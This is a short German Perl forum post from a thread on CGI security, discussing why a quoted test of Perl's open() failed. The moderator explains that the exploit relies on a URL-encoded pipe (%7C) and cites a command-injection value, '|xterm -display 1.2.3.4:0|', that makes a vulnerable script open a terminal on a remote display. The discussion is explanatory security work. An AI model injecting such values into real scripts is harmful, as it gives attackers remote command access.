Thread CGI Sicherheit: Vermeidung gefährlicher Inhalte (165 answers)
Opened by Gast at 2005-12-12 17:10

Dubu
 2005-12-19 10:48
#6222 #6222
User since
2003-08-04
2145 Artikel
ModeratorIn + EditorIn

user image
[quote=pq,19.12.2005, 01:30]
Code: (dl )
1
2
3
4
5
6
tina@lux:~> perl -wle'
my $file = "xterm -display :0";
open FH, $file or die $!;
print while <FH>'
Datei oder Verzeichnis nicht gefunden at -e line 3.
tina@lux:~>
[/quote]
Kein Wunder, dass das nicht klappt, du hast das Pipezeichen aus dem Exploitcode (%7C) weggelassen.

Der Exploitcode ist aber trotzdem kein guter Stil, weil er eine Pipe der Form "|xterm -display 1.2.3.4:0|" oeffnen will, und das ist natuerlich keine korrekte Syntax. Das funktioniert zwar trotzdem, gibt aber unter warnings eine Meldung ("Can't open bidirectional pipe at...").
Antworten mit Zitat

View full thread CGI Sicherheit: Vermeidung gefährlicher Inhalte